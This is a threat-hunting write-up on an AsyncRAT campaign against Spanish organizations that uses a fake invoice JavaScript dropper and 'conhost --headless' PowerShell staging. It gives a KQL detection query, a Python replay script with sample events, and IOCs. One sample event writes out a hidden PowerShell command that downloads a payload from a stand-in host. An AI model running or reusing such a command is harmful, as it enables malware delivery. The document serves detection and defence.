During the month of March, Alpine's Threat Hunting team identified several malicious campaigns against Spanish organizations aimed at infecting them with the open-source RAT AsyncRAT. This RAT, released in 2019 and commonly used by various threat actors, can perform all kinds of offensive actions on the compromised computer: keylogging, screen recording, exfiltration, etc.
In the TTPs observed, the threat actor sends the victims an obfuscated .js file under the pretext that it is an invoice.
The JavaScript, executed via WScript, acts as a dropper that downloads the next stage with PowerShell, launched through the LOLBin "conhost --headless".
An effective way to identify the staging phase used in this type of campaign is to monitor for the combination of conhost and the --headless argument in a command line that also invokes powershell. See, for example, the following KQL query.
DeviceProcessEvents
| where ProcessCommandLine contains "conhost"
    and ProcessCommandLine contains "--headless"
    and ProcessCommandLine contains "powershell"
| project Timestamp, ActionType, FileName, ProcessCommandLine
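As an added example (not part of the original write-up or of any Alpine tooling), the following Python replays the same three-condition check over constructed DeviceProcessEvents-style rows, so the logic can be tested offline before it is deployed as a hunting query. The sample rows, hostnames and timestamps are constructed; the parent-process column and the resulting "ParentIsWScript" context flag are an assumption added here, drawn from the WScript dropper behaviour described above rather than from the original query.

```python
"""Replay the conhost / --headless / powershell detection over constructed
process-creation events. Example code added for this write-up; the rows
below are constructed samples, not telemetry from the campaign."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    timestamp: str
    action_type: str
    file_name: str
    process_command_line: str
    parent_file_name: str = ""  # initiating process (assumed column, used for the WScript context check)


# Constructed sample telemetry (hypothetical command lines and hosts)
SAMPLE_EVENTS = [
    # Dropper path described above: wscript -> conhost --headless -> powershell
    ProcessEvent("2024-03-05T09:12:44Z", "ProcessCreated", "conhost.exe",
                 'conhost.exe --headless powershell.exe -w hidden -nop -c "iwr http://example.invalid/stage2"',
                 "wscript.exe"),
    # Ordinary console host spawned for a cmd session: no --headless, no powershell
    ProcessEvent("2024-03-05T09:13:02Z", "ProcessCreated", "conhost.exe",
                 r"\??\C:\Windows\system32\conhost.exe 0x4", "cmd.exe"),
    # Scheduled PowerShell script: no conhost in the command line
    ProcessEvent("2024-03-05T09:15:10Z", "ProcessCreated", "powershell.exe",
                 "powershell.exe -File C:\\scripts\\backup.ps1", "taskeng.exe"),
    # Same technique with mixed case; KQL 'contains' is case-insensitive, so this must still match
    ProcessEvent("2024-03-05T10:01:33Z", "ProcessCreated", "CONHOST.EXE",
                 "CONHOST.EXE --HEADLESS POWERSHELL -enc SQBFAFgA", "explorer.exe"),
]

# The three substrings the KQL 'where' clause requires
REQUIRED_TOKENS = ("conhost", "--headless", "powershell")


def matches_headless_conhost(cmdline):
    """Mirror the KQL condition: every token present, compared case-insensitively."""
    lowered = cmdline.lower()
    return all(token in lowered for token in REQUIRED_TOKENS)


def hunt(events):
    """Return the projected columns for each matching event, plus a context flag
    that is True when the initiating process is wscript.exe (assumed enrichment)."""
    hits = []
    for event in events:
        if not matches_headless_conhost(event.process_command_line):
            continue
        hits.append({
            "Timestamp": event.timestamp,
            "ActionType": event.action_type,
            "FileName": event.file_name,
            "ProcessCommandLine": event.process_command_line,
            "ParentIsWScript": event.parent_file_name.lower() == "wscript.exe",
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Running the block prints the two constructed rows that satisfy all three conditions; the benign conhost and scheduled-PowerShell rows are left out, which is the point of requiring the full combination rather than alerting on conhost or powershell alone.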
IOC:
- fuau4z3a[.]top
- mints1fuau4z3a[.]top
- http://eventoscasacordillera[.]Cl
- Script: _Factura_01981865434_PDF.js
- SHA1: 7ca093a76131ad56bf11a520a512c2d1cfd222fd